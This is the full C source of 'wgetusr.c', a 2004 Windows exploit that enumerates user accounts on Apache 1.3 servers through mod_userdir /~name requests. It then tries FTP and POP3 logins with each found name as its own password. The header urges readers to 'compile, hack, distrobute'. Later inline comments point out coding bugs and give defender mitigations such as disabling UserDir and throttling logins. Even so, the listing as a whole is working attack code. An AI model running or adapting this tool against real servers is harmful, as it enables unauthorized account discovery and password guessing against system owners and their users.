
Apache 1.3.x mod_userdir Exploit (wgetusr.c)



/*-------------------------------------------------------------------

 *

 * Exploit: wgetusr.c Windows Version

 * Author: HighT1mes (John Bissell)

 * Date Released: July 21, 2004

 *

 * --- Code ported to Windows with some added code,

 *     based on getusr.c exploit by CoKi ---

 *

 * Description from CoKi:

 * ======================

 *

 * This tool tries to find users on an Apache 1.3.*

 * server through a wrong default configuration of

 * the mod_userdir module. 

 *

 * My Belief:

 * ===========

 *

 * I believe in the current state of the web right 

 * now this information leak bug can be pretty nasty. 

 * Once you have a couple login names on a system 

 * there are many services the attacker can target 

 * to attack and work his way into the target system 

 * to get local access. 

 *

 * Program Usage:

 * ==============

 *

 * Use: wgetusr [options] -h <host> -u <users file>

 *          -h     Host

 *          -u     Users file

 *         Options

 *          -f     Try log on via FTP

 *          -p     Try log on via POP3

 *

 * VC++ 6.0 Compilation Information:

 * =================================

 *

 * First go on the net and get the getopt libs and header

 * file for VC++ 6.0 Here's a link...

 *

 * http://prantl.host.sk/getopt/files/getopt-msvs6.zip 

 *

 * Now extract the libs into your standard VC++ Lib directory, 

 * and extract the getopt.h header file of course into the 

 * Include directory.

 *

 * Now to compile make a new console app project,

 * then put this source file in the project.

 * Next goto Project->Settings. Then click on

 * the link tab then goto the input catagory. 

 * Now add getopt.lib to the end of objects/librarys 

 * modules text box. Then in the Ignore Librarys 

 * text box type LIBCD.lib to ignore that lib and allow

 * compilation to complete because of getopt lib.

 *

 * Also, where you added getopt.lib to the

 * objects/librarys modules text box put ws2_32.lib

 * in that text box as well.

 *

 * Your all set compile, hack, distrobute, have fun! :)

 *

*-------------------------------------------------------------------*/



#include 

#include 

#include 

#include 

#include 

#include 



/* Size of the per-line user-name buffer and of the outgoing request buffers. */
#define DATAMAX 50

/* Size of the buffer that server replies are received into. */
#define BUFFER 1000

/* Value used throughout the file to signal a failed socket/connect step. */
#define TCPIP_ERROR -1

/* Seconds handed to connect_timeout() by mkconn(). */
#define TIMEOUT 3

/* Ports passed to mkconn() for the three services this file talks to. */
#define HTTP_PORT 80

#define FTP_PORT 21

#define POP3_PORT 110

/* Forward declarations; every function below is defined later in this file. */
void use(char *program);

int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout);

void vrfy_apache(char *host);

void vrfy_vuln(char *host);

int test_user(char *host, char *user);

int trylogonFTP(char *host, char *user, char *pass);

int mkconn(char *host, unsigned short port);

int trylogonPOP3(char *host, char *user, char *pass);

/*
 * File-scope state shared by every function:
 *   he       - result of gethostbyname() in main(); mkconn() reads the
 *              target address from it.
 *   fuser    - array of names for which test_user() returned 0.
 *   sockfd   - the single socket handle; overwritten by each mkconn() call.
 *   dest_dir - destination address filled in by mkconn().
 */
struct hostent *he;

char **fuser;

int sockfd;

struct sockaddr_in dest_dir;



/*
 * Entry point. Parses -h/-u/-f/-p, counts and loads the candidate name
 * list, checks that the host resolves, accepts a connection on port 80,
 * identifies itself as Apache (vrfy_apache) and answers 403 for /~root
 * (vrfy_vuln). It then calls test_user() once per list entry and keeps the
 * names that returned 0 in fuser[]. With -f and/or -p each kept name is
 * passed to trylogonFTP()/trylogonPOP3() with the password equal to the
 * name itself.
 *
 * Returns 0 at the end of a full run, EXIT_FAILURE when WSAStartup() fails;
 * several other failure paths call exit(1) directly.
 *
 * Defender note: on the server side this run appears as one short-lived
 * connection per list entry, each requesting /~<name>, followed (with
 * -f/-p) by one login attempt per discovered name. Per-source rate
 * limiting and alerting on runs of /~<name> requests, plus lockout or
 * throttling on the mail/FTP services, are the relevant controls.
 */
int main(int argc, char *argv[]) {

  FILE *userlist;
  /* NOTE(review): getopt() returns int; storing it in a char and comparing
     with EOF only works where plain char is signed -- confirm for the
     target compiler. */
  char c, *host=NULL, *ulist=NULL;
  char user[DATAMAX];
  int ucant=0, flogged=0, plogged=0, optftp=0, optpop=0, stop=0;
  unsigned int cant=0, i, user_num;
  WSADATA wsaData;
  int result=0;

  printf(" =================================\n");
  printf("   wgetusr exploit by HighT1mes\n");
  printf("  Based on getusr.c code by CoKi\n");
  printf(" =================================\n\n");
  Sleep(1000);

  /* use() prints the usage text and exits, so control does not return. */
  if(argc < 2) use(argv[0]);

  result = WSAStartup( MAKEWORD( 2,2 ), &wsaData );
 	if ( result != NO_ERROR ) {
    		printf( "Error at WSAStartup()\n" );
		return( EXIT_FAILURE );
	}

  while((c = getopt(argc, argv, "h:u:fp")) != EOF) {
    switch(c) {
      case 'h':
               host = optarg;
               break;
      case 'u':
               ulist = optarg;
               break;
      case 'f':
               optftp = 1;
               break;
      case 'p':
               optpop = 1;
               break;
      default :
               use(argv[0]);
               break;
    }
  }

  /* Both -h and -u are mandatory. */
  if(host == NULL) use(argv[0]);
  if(ulist == NULL) use(argv[0]);
  
  printf(" [+] verifying list:\t");

  /* NOTE(review): this and the later exit(1) paths leave without calling
     WSACleanup() or closing the list file. */
  if((userlist = fopen(ulist, "r")) == NULL) {
    printf("Failed\n\n");
    exit(1);
  }
  
  /* Counts newline characters, so a last line without a trailing newline is
     not included in ucant. */
  while(!feof(userlist)) if('\n' == fgetc(userlist)) ucant++;
  rewind(userlist);
      
  printf("OK (%d users)\n", ucant);
  Sleep(1000);
  /* NOTE(review): sizeof(ucant) is the size of an int, not room for ucant
     pointers, and the result is not checked for NULL. Every fuser[cant]
     store below beyond what fits in those few bytes writes past the
     allocation. */
  fuser = (char **)malloc(sizeof(ucant));

  printf(" [+] verifying host:\t");
      
  /* NOTE(review): Winsock reports resolver errors through WSAGetLastError(),
     so the perror() text here may not describe the failure -- confirm. */
  if((he=gethostbyname(host)) == NULL) {
    perror("Error: ");
	Sleep(1000);
    printf("\n");
    exit(1);
  }

  printf("OK\n");
  Sleep(1000);

  printf(" [+] connecting:\t");

  /* Reachability check only: the socket is closed again right after. */
  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) {
    printf("Closed\n\n");
	Sleep(1000);
    exit(1);
  }
  
  printf("OK\n");
  Sleep(1000);
  closesocket(sockfd);

  /* Both checks call exit(1) themselves when they fail. */
  vrfy_apache(host);
  Sleep(1000);
  
  vrfy_vuln(host);
  Sleep(1000);
      
  user_num = 1;
  while(!feof(userlist)) {
    if(fgets(user, sizeof(user), userlist) == NULL) break;
    /* Drops the last character on the assumption that it is '\n'. A line
       longer than the buffer, or a final line without a newline, loses a
       real character instead. */
    user[strlen(user)-1] = '\0';
       
    /* test_user() returns 0 when the reply contained "403". */
    if(test_user(host, user) == 0) {
      /* sizeof(user) is DATAMAX, so each copy gets a full-size buffer. The
         malloc() result is not checked. */
      fuser[cant] = (char *)malloc(sizeof(user));
      memcpy(fuser[cant],user,strlen(user));
      memset(fuser[cant]+strlen(user),0,1);
      cant++;
    }

	/* Clears the console and redraws the progress lines on every entry. */
	system("CLS");
	printf(" wgetusr exploit by HighT1mes\n\n");
	printf(" [+] searching for system accounts, please wait...\n");
	printf(" [+] processing user #%d\n", user_num);
	user_num++;
  }
   
  if(cant == 0) {
    printf("     no users found\n\n");
    exit(1);
  }
  else {
	/* print out valid usernames found */
	printf(" [+] scan results for %s:\n\n", host);
	for (i = 0; i < cant; i++) {
		printf("     found username: %s\n", fuser[i]);
	}
  }

  printf("\n");

  if(optftp == 1) {
    stop = 0;
    printf(" [+] trying log on via FTP...\n");
    printf(" [+] connecting:\t");

    
    if(mkconn(host, FTP_PORT) == TCPIP_ERROR) {
      printf("Closed\n");
      stop = 1;
    }
  
    if(!stop) {
      printf("OK\n");
      closesocket(sockfd);
      for(i=0; i < cant; i++) {
        /* The name is passed as both user and password. */
        if(trylogonFTP(host, fuser[i], fuser[i]) == 0) {
          printf("     logged in: %s\n", fuser[i]);
          flogged++;
        }
      }
      if(flogged == 0) printf("     no users logged in\n");
    }
  }  

  if(optpop == 1) {
    stop = 0;
    printf(" [+] trying log on via POP3...\n");
    printf(" [+] connecting:\t");
    /* NOTE(review): expression statement with no effect; possibly a call
       whose name was lost when the listing was transcribed -- confirm. */
    (stdout);
    
    if(mkconn(host, POP3_PORT) == TCPIP_ERROR) {
      printf("Closed\n");
      stop = 1;
    }
    
    if(!stop) {
      printf("OK\n");
      closesocket(sockfd);
      for(i=0; i < cant; i++) {
        /* Same name-as-password attempt as in the FTP branch. */
        if(trylogonPOP3(host, fuser[i], fuser[i]) == 0) {
          printf("     logged in: %s\n", fuser[i]);
          plogged++;
        }
      }
      if(plogged == 0)  printf("     no users logged in\n"); 
    }
  }
     
  printf("\n");
  /* fuser and its entries are never freed before returning. */
  fclose(userlist);
  WSACleanup();
  return 0;
}



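/*
 * Print the command-line synopsis and terminate the process with status 1.
 *
 * program: name to show in the synopsis (callers pass argv[0]).
 *
 * The argument placeholders after -h and -u were missing from the synopsis
 * line in this listing; they are restored here from the option descriptions
 * printed below it.
 */
void use(char *program) {
  printf("Use: %s [options] -h <host> -u <users file>\n", program);
  printf("         -h\tHost\n");
  printf("         -u\tUsers file\n");
  printf("        Options\n");
  printf("         -f\tTry log on via FTP\n");
  printf("         -p\tTry log on via POP3\n");
  /* Never returns: callers rely on this to stop after a usage error. */
  exit(1);
}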



/*
 * Connect socket `sfd` to `serv_addr`, waiting with select() for up to
 * `timeout` seconds when connect() does not succeed immediately.
 *
 * Returns the connect() result when it is >= 0, 0 when select() reports the
 * socket ready and getpeername() succeeds, and -1 otherwise.
 */
int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout) 
{
  int res, slen, flags;
  struct timeval tv;
  struct sockaddr_in addr;
  fd_set rdf, wrf;
  int iMode = 0;

  /* NOTE(review): in Winsock, FIONBIO with a zero argument selects blocking
     mode, so the connect() below would block and the select() timeout would
     only be reached after connect() has already failed -- confirm. */
  ioctlsocket(sfd, FIONBIO, &iMode);

  res = connect(sfd, serv_addr, sizeof(struct sockaddr));

  /* Connected right away: nothing to wait for. */
  if (res >= 0) return res;

  FD_ZERO(&rdf);
  FD_ZERO(&wrf);

  FD_SET(sfd, &rdf);
  FD_SET(sfd, &wrf);
  memset(&tv, 0, sizeof(tv));
  tv.tv_sec = timeout;

  /* 0 means the timeout expired, a negative value means select() failed. */
  if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
    return -1;

  if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
    /* getpeername() only succeeds on a connected socket, so it is used here
       to tell a completed connect from a failed one. */
    slen = sizeof(addr);
    if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
    return -1;

    /* NOTE(review): this looks like a port of an fcntl() get-flags /
       set-flags pair. ioctlsocket() returns a status code rather than a
       flag word and is given a NULL argument here -- confirm what mode the
       socket ends up in. */
    flags = ioctlsocket(sfd, FIONBIO, NULL);
	iMode = flags & ~iMode;
    ioctlsocket(sfd, FIONBIO, &iMode);

    return 0;
  }

  return -1;
}



/*
 * Send "HEAD / HTTP/1.0" to port 80 and look for the text "Server: Apache"
 * in the reply. Prints OK when it is found; otherwise prints NO and exits
 * the process with status 1.
 *
 * Defender note: this is a banner check only. Hiding or altering the Server
 * header stops this step but does not change how mod_userdir answers.
 */
void vrfy_apache(char *host) {
  char buf[BUFFER], sendstr[DATAMAX];
        
  printf(" [+] verifying Apache:\t");

  /* NOTE(review): a failed connect is reported but not acted on; the send()
     and recv() below still run on the unconnected socket. */
  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n");

  /* NOTE(review): sendstr is not cleared first and send() transmits all
     sizeof(sendstr) bytes, so the bytes after the request text are
     uninitialised stack contents that go out on the wire. */
  sprintf(sendstr, "HEAD / HTTP/1.0\n\n");
  send(sockfd, sendstr, sizeof(sendstr), 0);
  memset(buf, 0, sizeof(buf));
  /* NOTE(review): the recv() result is ignored, and a reply that fills the
     whole buffer leaves buf without a terminator for strstr(). */
  recv(sockfd, buf, sizeof(buf), 0);
            
  if(strstr(buf, "Server: Apache")) printf("OK\n");
  else {
    printf("NO\n\n");
    /* Exits without closing the socket. */
    exit(1);
  }

  closesocket(sockfd);
}



/*
 * Request /~root from port 80 and treat a reply containing "403" as proof
 * that the server exposes the mod_userdir behaviour this tool relies on.
 * Prints OK in that case; otherwise prints NO and exits with status 1.
 *
 * Defender note: the check depends on per-user URLs being mapped at all.
 * In Apache, `UserDir disabled` (or `UserDir disabled root` plus an explicit
 * list of enabled users) removes the mapping for accounts that should not
 * publish content.
 */
void vrfy_vuln(char *host) {
  char buf[BUFFER], sendstr[DATAMAX];
          
  printf(" [+] vulnerable:\t");
  
  /* NOTE(review): as in vrfy_apache(), execution continues after a failed
     connect. */
  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("Closed\n");
  
  memset(sendstr, 0, sizeof(sendstr));
  /* Request line without an HTTP version; the full zero-padded buffer is
     sent. */
  sprintf(sendstr, "GET /~root\n");
  send(sockfd, sendstr, sizeof(sendstr), 0);

  /* NOTE(review): buf is not cleared before recv() and the byte count is
     ignored, so strstr() below can read uninitialised or unterminated
     data. */
  recv(sockfd, buf, sizeof(buf), 0);
                                        
  /* Matches "403" anywhere in the received bytes, not only in the status
     line. */
  if(strstr(buf, "403")) printf("OK\n");
  else {
    printf("NO\n\n");
    exit(1);
  }

  closesocket(sockfd);
}



/*
 * Request /~<user> from port 80 and report whether the reply contains
 * "403".
 *
 * Returns 0 when "403" is present (main() records the name as found) and 1
 * otherwise.
 *
 * Defender note: the information leak is the difference in response between
 * names that exist and names that do not. Disabling UserDir, or configuring
 * the server so both cases produce the same response, removes that signal;
 * in access logs the probing shows up as a run of /~<name> requests from one
 * source.
 */
int test_user(char *host, char *user) {
  char buf[BUFFER], sendstr[DATAMAX];
 
  if(mkconn(host, HTTP_PORT) == TCPIP_ERROR) printf("     Closed\n");
  
  memset(sendstr, 0, sizeof(sendstr));
  /* NOTE(review): the fixed text takes 7 bytes plus the terminator, so any
     name longer than DATAMAX - 8 characters overflows sendstr. main() can
     pass names of up to DATAMAX - 2 characters. */
  sprintf(sendstr, "GET /~%s\n", user);
  send(sockfd, sendstr, sizeof(sendstr), 0);
  
  /* NOTE(review): buf is uninitialised and the recv() result is ignored, as
     in vrfy_vuln(). */
  recv(sockfd, buf, sizeof(buf), 0);

  if(strstr(buf, "403")) return 0;
  else return 1;
                                                      
  /* Unreachable: both branches above return, so the socket opened by
     mkconn() is never closed here. */
  closesocket(sockfd); 
}



/*
 * Connect to port 21, send "USER <user>" and "PASS <pass>", and report
 * whether the reply to PASS contains "230".
 *
 * Returns 0 when "230" is present, 1 otherwise.
 *
 * Defender note: main() calls this with the password equal to the account
 * name, so the accounts at risk are those whose password matches the login.
 * Password policy and login throttling on the FTP service are the
 * mitigations.
 */
int trylogonFTP(char *host, char *user, char *pass) {
  char buf[BUFFER], *senduser, *sendpass;
  
  /* NOTE(review): sizeof is applied to a pointer expression, so each buffer
     is pointer-sized regardless of the string length. The sprintf() calls
     below write strlen + 7 bytes and overflow it for any non-trivial name.
     Neither allocation is checked or freed. */
  senduser = malloc(sizeof(user+6));
  sendpass = malloc(sizeof(pass+6));
  
  sprintf(senduser,"USER %s\n",user);
  sprintf(sendpass,"PASS %s\n",pass);
  
  /* Continues even when the connect failed. */
  if(mkconn(host, FTP_PORT) == TCPIP_ERROR) printf("     Closed\n");
  
  /* Read the greeting, then alternate command and reply. recv() results are
     not checked and each reply is assumed to arrive in a single read. */
  memset(buf,0,sizeof(buf));
  recv(sockfd,buf,sizeof(buf),0);
  send(sockfd,senduser,strlen(senduser), 0);
  memset(buf,0,sizeof(buf));
  recv(sockfd,buf,sizeof(buf),0);
  send(sockfd,sendpass,strlen(sendpass), 0);
  memset(buf,0,sizeof(buf));
  recv(sockfd,buf,sizeof(buf),0);
  
  /* Matches "230" anywhere in the last reply. */
  if(strstr(buf, "230")) return 0;
  else return 1;
                                                      
  /* Unreachable: the socket is left open on every call. */
  closesocket(sockfd); 
}



/*
 * Create a TCP socket in the global `sockfd` and connect it to `port` on
 * the address held in the global `he`, bounded by TIMEOUT via
 * connect_timeout().
 *
 * host: accepted for symmetry with the callers but not read; the address
 *       comes from `he`, which main() fills in before the first call.
 * port: destination port in host byte order.
 *
 * Returns 0 once connected and TCPIP_ERROR when the connect step fails. A
 * failure to create the socket prints an error and exits with status 1.
 */
int mkconn(char *host, unsigned short port) {
  int status;

  sockfd = socket(AF_INET, SOCK_STREAM, 0);
  if (sockfd == TCPIP_ERROR) {
    perror("Error");
    printf("\n");
    exit(1);
  }

  /* Fill in the shared destination record for this attempt. */
  dest_dir.sin_family = AF_INET;
  dest_dir.sin_port = htons(port);
  dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(dest_dir.sin_zero), 0, 8);

  /* On failure the socket is left for the caller; it is not closed here. */
  status = connect_timeout(sockfd, (struct sockaddr *)&dest_dir, TIMEOUT);
  if (status == TCPIP_ERROR)
    return TCPIP_ERROR;

  return 0;
}



/*
 * Connect to port 110, send "USER <user>" and "PASS <pass>", and report
 * whether the reply to PASS contains "+OK".
 *
 * Returns 0 when "+OK" is present, 1 otherwise.
 *
 * Defender note: as with the FTP variant, main() passes the account name as
 * the password; login throttling and a policy that rejects name-equals-
 * password credentials address this step.
 */
int trylogonPOP3(char *host, char *user, char *pass) {
  char buf[BUFFER], *senduser, *sendpass;
  
  /* NOTE(review): same sizing defect as trylogonFTP(): sizeof of a pointer
     expression yields the pointer size, so the sprintf() calls overflow
     these buffers. Neither allocation is checked or freed. */
  senduser = malloc(sizeof(user+6));
  sendpass = malloc(sizeof(pass+6));

  sprintf(senduser,"USER %s\n",user);
  sprintf(sendpass,"PASS %s\n",pass);
      
  /* Continues even when the connect failed. */
  if(mkconn(host, POP3_PORT) == TCPIP_ERROR) printf("     Closed\n");
  
  /* Greeting, USER reply, PASS reply; only the last one is inspected. */
  memset(buf,0,sizeof(buf));
  recv(sockfd,buf,sizeof(buf),0);
  send(sockfd,senduser,strlen(senduser), 0);
  memset(buf,0,sizeof(buf));
  recv(sockfd,buf,sizeof(buf),0);
  send(sockfd,sendpass,strlen(sendpass), 0);
  memset(buf,0,sizeof(buf));
  recv(sockfd,buf,sizeof(buf),0);

  if(strstr(buf, "+OK")) return 0;
  else return 1;
    
  /* Unreachable: the socket is left open on every call. */
  closesocket(sockfd);                  
}



/* EOF */
